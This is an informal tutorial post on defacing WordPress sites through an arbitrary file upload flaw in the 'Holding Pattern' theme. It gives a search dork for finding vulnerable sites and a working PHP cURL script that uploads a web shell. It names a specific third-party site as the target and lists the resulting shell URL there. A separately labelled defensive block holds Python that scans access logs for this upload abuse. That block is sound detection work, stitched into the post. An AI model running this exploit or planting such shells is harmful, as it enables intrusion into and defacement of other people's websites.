Okay ~ This Time I Will Cover How to Deface With an Exploit ~ WordPress Theme Holding Pattern Arbitrary File Upload Vulnerability ...
Okay, let's get straight to it, yup ~_^
Dork : inurl:wp-content/themes/holding_pattern
PHP code:
<?php
$uploadfile="chaYankVica.php";
$target = "http://www.shani-indira.org/wp-content/themes/holding_pattern/admin/upload-file.php";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
How do you upload the shell? You can use XAMPP, or upload the shell via a shell that has cURL enabled :)))
Shell access: www.shani-indira.org/wp-content/themes/holding_pattern/admin/chaYankVica.php
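Seen from the defender's side, as an added example that is not part of the original post: a log check that flags POSTs to the theme's `admin/upload-file.php` and any later successful request for another PHP file in the same directory. The "combined" access-log format, the sample lines, the IP addresses and the file name `example-dropped.php` are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Paths come from the post; the "combined" access-log format is an assumption.
ADMIN_DIR = "/wp-content/themes/holding_pattern/admin/"
UPLOADER = "upload-file.php"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')
PHP_RE = re.compile(r"\.(php\d?|phtml|phar)$")

def find_upload_abuse(lines):
    """Flag POSTs to the theme uploader and later 2xx hits on other PHP files beside it.

    Expects lines in chronological order; returns (kind, ip, timestamp, file, status) tuples.
    """
    findings, posters = [], set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # Drop the query string, decode %xx, collapse "//", ignore case.
        path = re.sub(r"/{2,}", "/", unquote(m["uri"].split("?", 1)[0])).lower()
        _, found, rest = path.partition(ADMIN_DIR)
        if not found:
            continue
        name = rest.split("/", 1)[0]  # trailing path info still counts for the script
        hit = (m["ip"], m["ts"], name, int(m["status"]))
        if name == UPLOADER:
            if m["method"] == "POST":
                posters.add(m["ip"])
                findings.append(("upload_post",) + hit)
        elif PHP_RE.search(name) and posters and 200 <= hit[3] < 300:
            kind = "new_php_same_client" if m["ip"] in posters else "new_php_other_client"
            findings.append((kind,) + hit)
    return findings

# Constructed sample log (documentation IP ranges, placeholder file name).
P = "/wp-content/themes/holding_pattern"
SAMPLE_LOG = [
    f'198.51.100.7 - - [10/Mar/2015:04:12:01 +0000] "GET {P}/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - [10/Mar/2015:04:13:40 +0000] "POST {P}/admin/upload-file.php HTTP/1.1" 200 31 "-" "-"',
    f'203.0.113.9 - - [10/Mar/2015:04:13:55 +0000] "GET {P}/admin/example-dropped.php HTTP/1.1" 200 812 "-" "-"',
    f'198.51.100.7 - - [10/Mar/2015:04:15:02 +0000] "GET {P}/admin/upload-file.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    f'198.51.100.20 - - [10/Mar/2015:04:20:10 +0000] "GET {P}/admin/example-dropped.php HTTP/1.1" 200 812 "-" "-"',
    f'198.51.100.20 - - [10/Mar/2015:04:20:11 +0000] "GET {P}/admin/missing.php HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Legitimate PHP files that ship in the theme's `admin/` directory will also be reported once an upload POST has been seen, so compare each reported name against a clean copy of the theme.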
Okay, that's about it :)))
Hope it's useful 'v')/
